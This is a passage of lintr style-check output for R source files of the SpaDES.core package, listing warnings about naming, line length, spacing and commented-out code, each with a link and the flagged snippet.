^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:507:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/cache.R#L507) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:530:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/cache.R#L530) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:622:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/cache.R#L622) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) {\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:649:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/cache.R#L649) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:657:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/cache.R#L657) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            ^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         ^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            ^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 ^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/downloadData.R#L250) *style:* **Commented code should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:268:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/downloadData.R#L268) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:269:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/downloadData.R#L269) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:272:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:272:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:272:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     ^\n```\n[R/downloadData.R:272:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             ^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        ^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    ^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, 